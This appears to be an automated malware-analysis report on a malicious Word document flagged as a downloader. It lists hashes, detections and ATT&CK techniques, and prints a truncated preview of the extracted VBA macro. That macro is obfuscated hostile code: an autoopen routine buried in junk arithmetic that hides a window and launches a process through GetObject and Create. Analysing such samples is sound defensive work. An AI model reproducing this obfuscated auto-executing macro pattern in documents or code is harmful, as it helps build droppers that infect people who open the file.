Office (OLE) malware analysis — malicious · 34ddb84de696b5a8

MALICIOUS

Office (OLE)

153.2 KB Created: 2019-03-20 14:29:00 Authoring application: Microsoft Office Word First seen: 2019-04-21

MD5: c31014a9efd10203cfa48028ca928392 SHA-1: 132ddc2d64254fa33db5bad7f7a93ad010fc7ab6 SHA-256: 34ddb84de696b5a8a8cf0423c5b3fb9dfddf608f218095f7e39e97d9eefc9c51

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'autoopen' macro utilizes the GetObject function, a common technique for executing embedded or downloaded payloads. The ClamAV detection 'Doc.Downloader.Sagent-6902866-0' further supports its role as a downloader. While the specific download URL is not directly present in the extracted evidence, the presence of VBA macros and the GetObject call strongly indicate a downloader pattern.

Heuristics 7

ClamAV: Doc.Downloader.Sagent-6902866-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sagent-6902866-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15299 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15299 bytes
SHA-256: `f1a246bbe6f80e3f29b2f9e22613e4a61c4aa682eba73a4521571d59627afa5c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "VAAwABo" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "bxDkQAB" Attribute VB_Base = "0{4ADD271E-62B3-4FC3-8D5F-5DAA1FB64C78}{8F2D98A8-7A22-4C62-9499-C611BDF06611}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "FBU_GAUQ" Sub autoopen() On Error Resume Next If bkUAAGAQ = AcAABw_ Then iXZAcADc = 818984927 * CInt(870248260) / _ 661857214 + Sqr(801325567) * 206703840 / CInt(999715560) * (213071604 * 812693045) qcAoAZ = (300041760 - Asc(VUQQBDB) / CDAAAG4G / 837334000 + _ wAAQcGBA / Fix(807015819 + Log(XQAGAADD * Sgn(456405636) + YQUQAAZA / CSng(650021952)))) End If If WwAQ4D4k = kAQk1QB_ Then dQ_AcC = 931148952 * CInt(87174455) / _ 975000336 + Sqr(383662918) * 109379300 / CInt(600710954) * (172450687 * 373407569) uBDAGA = (278084938 - Asc(wCABxXBk) / uAkQAAZ / 162012456 + _ F_UADoAD / Fix(669892230 + Log(NBAxx4A * Sgn(952752119) + YAxZ_QQ / CSng(728383211)))) End If If hAQDBA = Ex4ADAA Then iQDDB_ = 412887974 * CInt(634221319) / _ 129733626 + Sqr(54445718) * 206005216 / CInt(714414628) * (564723357 * 530991518) RkADQDBB = (535993688 - Asc(GUXwD4cc) / ADBDAA / 990022775 + _ bZUXAAUA / Fix(381897607 + Log(oBAA1w * Sgn(930938977) + FBBBZA / CSng(30944015)))) End If Set OGXoDB = GetObject(bxDkQAB.Y1BxADo) If wAAUQxA = MCBDxU_k Then kA4ABAA = 934535510 * CInt(918861163) / _ 219172688 + Sqr(23570679) * 824949853 / CInt(547517805) * (373519339 * 16479815) qCACAAXA = (788865896 - Asc(loBwA__Q) / vAxDB1A / 420566520 + _ SAAAAA / Fix(651542787 + Log(WAAZxwAD * Sgn(812284043) + uwAXAA / CSng(882054045)))) End If If OAZAxAAA = BXAAXCU Then TCCAA_ = 99052273 * CInt(72248205) / _ 703550566 + Sqr(818230063) * 53132344 / CInt(706909604) * (196099915 * 401345730) K_AADDQ = (92390653 - Asc(cXAAUxBA) / QGAQAB / 557796722 + _ nAQAAc_D / Fix(547186464 + Log(JoAACoA_ * Sgn(407622150) + UoQAQA1U / CSng(544333238)))) End If If YkAZXDDD = Z4AABA Then sQUZk4 = 675471138 * CInt(244123964) / _ 360916293 + Sqr(345151611) * 53110634 / CInt(477692344) * (263086134 * 83001223) bXXxA4UA = (888986178 - Asc(nAAAUAA) / OccAAC / 9558557 + _ woAc1k / Fix(644149644 + Log(uADG4X * Sgn(74501564) + GAAAAD_ / CSng(670649822)))) End If OGXoDB.ShowWindow = 356019 - 356019 If qBAAABAD = wB4UA1Do Then ucBQkA = 900992713 * CInt(81762444) / _ 858036521 + Sqr(449516603) * 115055982 / CInt(304942463) * (624910223 * 776633603) wUGZocQ = (12292019 - Asc(WGAAAG4A) / OwA4CcZA / 673731292 + _ rxADUX / Fix(997417007 + Log(XQcD4AAC * Sgn(794626535) + SUoDU_DB / CSng(895512750)))) End If If Y4BG4_AD = bUGDXA_A Then aBQZAA = 148453590 * CInt(632082997) / _ 443664009 + Sqr(190605587) * 698409771 / CInt(31221876) * (16190019 * 312953570) SQQkAx = (791713505 - Asc(rABAADZ) / SAAA4C / 316730691 + _ w1ZUDACB / Fix(680729175 + Log(DZQAkw * Sgn(898885597) + jkw1ACB / CSng(203643703)))) End If GetObject(bxDkQAB.X_AwZUA). _ Create# tQ4ABQC + bxDkQAB.A_A4UD + wXUAwBx + bxDkQAB.Mw1A1Awx + d_wCokAo + bxDkQAB.ZZBUoG + FAAUAX, A4GUBckA, OGXoDB, jZoDBXA If uDwoBA = QBA1o_ Then YxxAA4o = 525730236 * CInt(842812733) / _ 431672444 + Sqr(164576374) * 788601371 / CInt(250492118) * (961779926 * 829852977) FXAAAABB = (842791072 - Asc(iADAQZ4) / GAAXUA / 403480656 + _ DDAABAAA / Fix(690434272 + Log(XQ4A_oUD * Sgn(522870338) + RkC41ACw / CSng(591593070)))) End If If wc1oAAx = BBBUBoA Then fAD_ZCQA = 363077685 * CInt(569216700) / _ 40333973 + Sqr(289736201) * 399145316 / CInt(548857396) * (468572668 * 363601893) FGZDA4ck = (710304794 - Asc(TAcAAcAD) / RD4UAAA / 623017496 + _ ... (truncated)

SHA-256: f1a246bbe6f80e3f29b2f9e22613e4a61c4aa682eba73a4521571d59627afa5c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "VAAwABo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bxDkQAB"
Attribute VB_Base = "0{4ADD271E-62B3-4FC3-8D5F-5DAA1FB64C78}{8F2D98A8-7A22-4C62-9499-C611BDF06611}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "FBU_GAUQ"
Sub autoopen()
On Error Resume Next
   If bkUAAGAQ = AcAABw_ Then
      iXZAcADc = 818984927 * CInt(870248260) / _
661857214 + Sqr(801325567) * 206703840 / CInt(999715560) * (213071604 * 812693045)
      qcAoAZ = (300041760 - Asc(VUQQBDB) / CDAAAG4G / 837334000 + _
wAAQcGBA / Fix(807015819 + Log(XQAGAADD * Sgn(456405636) + YQUQAAZA / CSng(650021952))))
End If
   If WwAQ4D4k = kAQk1QB_ Then
      dQ_AcC = 931148952 * CInt(87174455) / _
975000336 + Sqr(383662918) * 109379300 / CInt(600710954) * (172450687 * 373407569)
      uBDAGA = (278084938 - Asc(wCABxXBk) / uAkQAAZ / 162012456 + _
F_UADoAD / Fix(669892230 + Log(NBAxx4A * Sgn(952752119) + YAxZ_QQ / CSng(728383211))))
End If
   If hAQDBA = Ex4ADAA Then
      iQDDB_ = 412887974 * CInt(634221319) / _
129733626 + Sqr(54445718) * 206005216 / CInt(714414628) * (564723357 * 530991518)
      RkADQDBB = (535993688 - Asc(GUXwD4cc) / ADBDAA / 990022775 + _
bZUXAAUA / Fix(381897607 + Log(oBAA1w * Sgn(930938977) + FBBBZA / CSng(30944015))))
End If
Set OGXoDB = GetObject(bxDkQAB.Y1BxADo)
   If wAAUQxA = MCBDxU_k Then
      kA4ABAA = 934535510 * CInt(918861163) / _
219172688 + Sqr(23570679) * 824949853 / CInt(547517805) * (373519339 * 16479815)
      qCACAAXA = (788865896 - Asc(loBwA__Q) / vAxDB1A / 420566520 + _
SAAAAA / Fix(651542787 + Log(WAAZxwAD * Sgn(812284043) + uwAXAA / CSng(882054045))))
End If
   If OAZAxAAA = BXAAXCU Then
      TCCAA_ = 99052273 * CInt(72248205) / _
703550566 + Sqr(818230063) * 53132344 / CInt(706909604) * (196099915 * 401345730)
      K_AADDQ = (92390653 - Asc(cXAAUxBA) / QGAQAB / 557796722 + _
nAQAAc_D / Fix(547186464 + Log(JoAACoA_ * Sgn(407622150) + UoQAQA1U / CSng(544333238))))
End If
   If YkAZXDDD = Z4AABA Then
      sQUZk4 = 675471138 * CInt(244123964) / _
360916293 + Sqr(345151611) * 53110634 / CInt(477692344) * (263086134 * 83001223)
      bXXxA4UA = (888986178 - Asc(nAAAUAA) / OccAAC / 9558557 + _
woAc1k / Fix(644149644 + Log(uADG4X * Sgn(74501564) + GAAAAD_ / CSng(670649822))))
End If
OGXoDB.ShowWindow = 356019 - 356019
   If qBAAABAD = wB4UA1Do Then
      ucBQkA = 900992713 * CInt(81762444) / _
858036521 + Sqr(449516603) * 115055982 / CInt(304942463) * (624910223 * 776633603)
      wUGZocQ = (12292019 - Asc(WGAAAG4A) / OwA4CcZA / 673731292 + _
rxADUX / Fix(997417007 + Log(XQcD4AAC * Sgn(794626535) + SUoDU_DB / CSng(895512750))))
End If
   If Y4BG4_AD = bUGDXA_A Then
      aBQZAA = 148453590 * CInt(632082997) / _
443664009 + Sqr(190605587) * 698409771 / CInt(31221876) * (16190019 * 312953570)
      SQQkAx = (791713505 - Asc(rABAADZ) / SAAA4C / 316730691 + _
w1ZUDACB / Fix(680729175 + Log(DZQAkw * Sgn(898885597) + jkw1ACB / CSng(203643703))))
End If
GetObject(bxDkQAB.X_AwZUA). _
Create# tQ4ABQC + bxDkQAB.A_A4UD + wXUAwBx + bxDkQAB.Mw1A1Awx + d_wCokAo + bxDkQAB.ZZBUoG + FAAUAX, A4GUBckA, OGXoDB, jZoDBXA
   If uDwoBA = QBA1o_ Then
      YxxAA4o = 525730236 * CInt(842812733) / _
431672444 + Sqr(164576374) * 788601371 / CInt(250492118) * (961779926 * 829852977)
      FXAAAABB = (842791072 - Asc(iADAQZ4) / GAAXUA / 403480656 + _
DDAABAAA / Fix(690434272 + Log(XQ4A_oUD * Sgn(522870338) + RkC41ACw / CSng(591593070))))
End If
   If wc1oAAx = BBBUBoA Then
      fAD_ZCQA = 363077685 * CInt(569216700) / _
40333973 + Sqr(289736201) * 399145316 / CInt(548857396) * (468572668 * 363601893)
      FGZDA4ck = (710304794 - Asc(TAcAAcAD) / RD4UAAA / 623017496 + _
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.